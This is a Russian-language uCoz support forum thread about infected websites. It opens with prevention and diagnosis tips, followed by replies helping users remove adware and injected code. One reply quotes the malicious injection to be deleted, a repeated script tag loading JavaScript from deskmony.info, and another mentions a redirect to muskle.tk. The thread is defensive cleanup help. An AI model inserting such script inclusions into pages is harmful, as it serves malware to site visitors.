Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1696 | 22:15:08 24 Янв 2015
    Juliya0787, это не то. оставьте в покое ccleaner. вы вообще воспринимаете что вам тут пишут или нет? прочитайте наши сообщения внимательно. ответьте на мои вопросы по браузерам. обратитесь сюда http://virusinfo.info/forumdi....hp?f=46 прочитайте правила подачи запроса http://virusinfo.info/showthread.php?t=1235 вам там помогут. только ЧИТАЙТЕ внимательно правила
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Juliya0787
    Сообщений: 38
    Репутация: 0

    Сообщение # 1697 | 22:28:45 24 Янв 2015
    Я умею читать, какие-то сомнения на этот счет? Baidu на компьютере нет
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1698 | 22:36:35 24 Янв 2015
    Juliya0787, не обязательно baidu. сделайте как написано тут http://virusinfo.info/showthread.php?t=146192 если боитесь не удаляйте ничего программой просто сделайте скриншот результат сканирования и выложите его сюда
    у вас во всех браузерах эффект с символами или нет?
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Juliya0787
    Сообщений: 38
    Репутация: 0

    Сообщение # 1699 | 22:47:05 24 Янв 2015
    На вирусинфо почему-то по ссылке не скачивается AdwCleaner. Пошла скачать в другом месте ...
    Эффект с символами только в мозилле. В гуглхроме этого не видела. Сейчас появляются только значки, обозначающие параграф. Иероглифов не видно что-то..
    Сообщение отредактировал Juliya0787 - Суббота, 24 Янв 2015, 22:52:15
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1700 | 22:57:48 24 Янв 2015
    Juliya0787, значит вы уже удалили. дальше наблюдайте за значками, особенно после перезагрузки компьютера. если появятся опять левые символы пробуйте отключить все расширения на мозиле или лучше запуститесь в безопасном режиме со всеми отключенными дополнениями. если левых символов не будет при запуске с отключенными дополнениями, то значит не все так страшно

    Цитата
    Сейчас появляются только значки, обозначающие параграф.
    скриншот можно?
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Juliya0787
    Сообщений: 38
    Репутация: 0

    Сообщение # 1701 | 19:56:59 25 Янв 2015
    Значки уже появляются через раз. Сейчас наоткрывала окон со своего сайта, пока не появляются. Но я уже успела скачать AdwCleaner, который перезапустил компьютер и создал папку карантин и несколько файлов с ключами. Но, по-моему, ничего не нашел. По крайней мере в главном окне ничего не было.
    
    Цитата
    если левых символов не будет при запуске с отключенными дополнениями, то значит не все так страшно
    Не хочется расслабляться, так как заметила, что после их появления появились частые подвисания

    webanet, спасибо Вам за терпение!

    Добавлено (25 Янв 2015, 19:56:59)
    ---------------------------------------------
    Нашелся таки байду на компе, следовала ссылке $Vladimir$
    Оказывается, не обязательно байде быть заметной.Нашла его только через реестр, и оттуда удаляю. Пока в работе(( Это редкая гадость, скажу я вам..
    Спасибо большое за помощь webanet и $Vladimir$ ! Без ваших наводок я бы еще долго кружила.(
    Сообщение отредактировал Juliya0787 - Воскресенье, 25 Янв 2015, 19:59:14
    tyrbo924
    Сообщений: 9
    Репутация: 0

    Сообщение # 1702 | 20:25:11 27 Янв 2015
    Админ!? Так что мне делать, я немогу зайти с многих браузеров на свой сайт? Может как то по другому можно это полечить?
    Прикрепления: 0534324.jpg (99.2 Kb)
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1703 | 20:48:14 27 Янв 2015
    tyrbo924, сделайте свой яндекс браузер не браузером по умолчанию
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    tyrbo924
    Сообщений: 9
    Репутация: 0

    Сообщение # 1704 | 21:31:17 27 Янв 2015
    Цитата webanet ()
    tyrbo924, сделайте свой яндекс браузер не браузером по умолчанию
    У меня вообще яндекс браузера нет и небыло никогда, по умолчанию стоит хром.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1705 | 21:32:25 27 Янв 2015
    tyrbo924, значит пишите в тех.поддержку //www.ucoz.ru/contact
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    $Vladimir$
    Сообщений: 7465
    Репутация: 1053

    Сообщение # 1706 | 09:36:36 28 Янв 2015
    Цитата tyrbo924 ()
    по умолчанию стоит хром.


    tyrbo924, а судя по скриншоту, вы усиленно используете IE. На данное время вам временно отключен форум ID:2
    Цитата
    Результат выборочной проверки
    Дата последней проверки Страница Вердикт
    20.01.2015 http://vmvracing.ucoz.ru/forum/2-1-1 Поведенческий анализ
    14.01.2015 http://vmvracing.ucoz.ru/forum/2-25-1 Поведенческий анализ
    09.01.2015 http://vmvracing.ucoz.ru/forum/2-7-1 Поведенческий анализ
    19.01.2015 http://vmvracing.ucoz.ru/forum/2-9-1 Поведенческий анализ


    Сайт отправлен на проверку. Рекомендую проверить темы форума и удалить битые ссылки на сайт statscreen.info

    Также смените DNS на Google Public DNS:
    8.8.8.8
    8.8.4.4
    tyrbo924
    Сообщений: 9
    Репутация: 0

    Сообщение # 1707 | 19:34:47 29 Янв 2015
    Цитата $Vladimir$ ()
    tyrbo924, а судя по скриншоту, вы усиленно используете IE. На данное время вам временно отключен форум ID:2
    IE использовал для пробы, скрин сделал потому что так получилось. По умолчанию стоит Хром, уже дано не пользуюсь Эксплоурером)))
    Что такое поведенческий анализ?
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1708 | 19:39:11 29 Янв 2015
    tyrbo924, вы должны уже войти на сайт нормально. удалите то, что я сказала
    Код
    <script src="http://deskmony.info/module/dshow.js" type="text/javascript"></script><script src="http://deskmony.info/module/dshow.js" type="text/javascript"></script><script src="http://deskmony.info/module/dshow.js" type="text/javascript"></script><script src="http://deskmony.info/module/dshow.js" type="text/javascript"></script>
    с помощью быстрой замены многострочный режим
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    $Vladimir$
    Сообщений: 7465
    Репутация: 1053

    Сообщение # 1709 | 09:31:40 30 Янв 2015
    tyrbo924, поведенческий анализ — анализ поведение JavaScript-кода и других активных элементов. Если поведение совпадает с эвристическими правилами, характерными для drive-by-download атак, например, детектор вредоносных Java апплетов или детектор вредоносных PDF документов обнаруживают попытку эксплуатации уязвимости для выполнения вредоносного кода, то принимается решение о том, что проверяемая страница является опасной для посетителей.

    tyrbo924, на данное время ваш сайт в результатах поиска выводится без пометок. Во избежание повторного срабатывания фильтра Яндекс, выполните рекомендации данные вам выше.
    Batyanya
    Сообщений: 35
    Репутация: 3
    Уровень замечаний:

    Сообщение # 1710 | 19:45:42 30 Янв 2015
    Здравствуйте
    С недавнего времени не могу зайти на свой сайт http://mymuzon.ucoz.ru
    при заходе на главную
    страницу сайта перебрасывает на http://muskle.tk/3.html
    Что делать?
    Пробовал вариант
    Для удаления нужно воспользоваться функцией Быстрой замены.
    Для этого надо пройти в панель управления - Дизайн - Управление дизайном -
    Быстрая замена
    Вставлял некоторые скрипты с

    //forum.ucoz.ru/forum/45-57475-1
    пишет: Не сделано ни одной замены
    Проверьте правильность заменяемого кода
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: